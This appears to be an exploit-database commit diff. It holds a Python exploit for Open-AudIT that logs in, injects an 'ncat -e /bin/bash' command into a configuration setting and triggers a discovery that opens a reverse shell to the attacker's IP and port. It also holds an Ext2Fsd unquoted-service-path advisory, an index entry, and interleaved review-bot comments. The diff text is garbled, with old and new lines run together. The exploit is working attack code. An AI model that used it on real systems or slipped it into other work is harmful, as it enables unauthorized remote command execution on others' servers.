DB: 2021-03-25

2 changes to exploits/shellcodes

Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
Offensive Security 2021-03-25 05:02:09 +00:00
parent 3f12367de8
commit 2f2c713a12
3 changed files with 56 additions and 32 deletions


@ -16,44 +16,40 @@ import string
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from urllib.parse import quote from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) !=3D 6: if len(sys.argv) != 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port= print("[~] Usage : ./openaudit-exploit.py url username password ip port")
")
exit() exit()
url =3D sys.argv[1] url = sys.argv[1]
username =3D sys.argv[2] username = sys.argv[2]
password =3D sys.argv[3] password = sys.argv[3]
ip =3D sys.argv[4] ip = sys.argv[4]
port =3D sys.argv[5] port = sys.argv[5]
request =3D requests.session() request = requests.session()
def inject_payload(): def inject_payload():
configuration_path =3D url+"/en/omk/open-audit/configuration/90" configuration_path = url+"/en/omk/open-audit/configuration/90"
data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"= data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
port)
request.patch(configuration_path, data) request.patch(configuration_path, data)
print("[+] Payload injected in settings") print("[+] Payload injected in settings")
def start_discovery(): def start_discovery():
discovery_path =3D url+"/en/omk/open-audit/discoveries/create" discovery_path = url+"/en/omk/open-audit/discoveries/create"
post_discovery_path =3D url+"/en/omk/open-audit/discoveries" post_discovery_path = url+"/en/omk/open-audit/discoveries"
scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r= scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
ange(10)]) req = request.get(discovery_path)
req =3D request.get(discovery_path)
response =3D req.text response = req.text
soup =3D BeautifulSoup(response, "html5lib") soup = BeautifulSoup(response, "html5lib")
token =3D soup.findAll('input')[5].get("value") token = soup.findAll('input')[5].get("value")
buttons =3D soup.findAll("button") buttons = soup.findAll("button")
headers =3D {"Referer" : discovery_path} headers = {"Referer" : discovery_path}
request_data =3D { request_data = {
"data[attributes][name]":scan_name, "data[attributes][name]":scan_name,
"data[attributes][other][subnet]":"10.10.10.1/24", "data[attributes][other][subnet]":"10.10.10.1/24",
"data[attributes][other][ad_server]":"", "data[attributes][other][ad_server]":"",
@ -101,23 +97,21 @@ ange(10)])
} }
print("[+] Creating discovery ..") print("[+] Creating discovery ..")
req =3D request.post(post_discovery_path, data=3Drequest_data, headers= req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
=3Dheaders, allow_redirects=3DFalse) disocvery_url = url + req.headers['Location'] + "/execute"
disocvery_url =3D url + req.headers['Location'] + "/execute"
print("[+] Triggering payload ..") print("[+] Triggering payload ..")
print("[+] Check your nc ;)") print("[+] Check your nc ;)")
request.get(disocvery_url) request.get(disocvery_url)
def login(): def login():
login_info =3D { login_info = {
"redirect_url": "/en/omk/open-audit", "redirect_url": "/en/omk/open-audit",
"username": username, "username": username,
"password": password "password": password
} }
login_request =3D request.post(url+"/en/omk/open-audit/login", login_in= login_request = request.post(url+"/en/omk/open-audit/login", login_info)
fo) login_text = login_request.text
login_text =3D login_request.text
if "There was an error authenticating" in login_text: if "There was an error authenticating" in login_text:
return False return False
else: else:
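Review bot: The local `disocvery_url` in start_discovery (the assignment just after the `request.post(...)` line in the second hunk, and the `request.get(disocvery_url)` two lines later) is misspelled; since the new side is the re-decoded text anyway, rename it `discovery_url` in both places so the name matches `discovery_path` and `post_discovery_path`. The usage branch in the first hunk should also terminate with `sys.exit(1)` rather than the bare `exit()`, which is a site-module convenience that is not guaranteed to be present when the interpreter runs without `site`, and a non-zero status lets a caller detect the bad invocation. The `login()` body continues past the end of this hunk, so its return path after `else:` is not visible here.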


@ -0,0 +1,29 @@
# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
# Date: 2021-1-19
# Exploit Author: Mohammed Alshehri
# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download
# Version: 0.68
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc Ext2Srv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Ext2Srv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Ext2 Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
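Review bot: The impact statement on the last line is not supported by the service listing above it: `BINARY_PATH_NAME` holds a single space, so the only alternate image Windows would resolve ahead of `C:\Program Files\Ext2Fsd\Ext2Srv.exe` is `C:\Program.exe`, and that depends on write access to the root of the system drive, which a default Windows 10 installation does not grant to standard users. Without the ACL of `C:\` shown alongside the `sc qc` output, the finding is an unquoted-path misconfiguration (fixed by quoting the path in the service definition) rather than a demonstrated privilege escalation. A line such as `# Note: requires write access to the root of the system drive, which standard users lack by default` would make the actual scope clear to readers of the advisory.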


@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port
49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows, 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
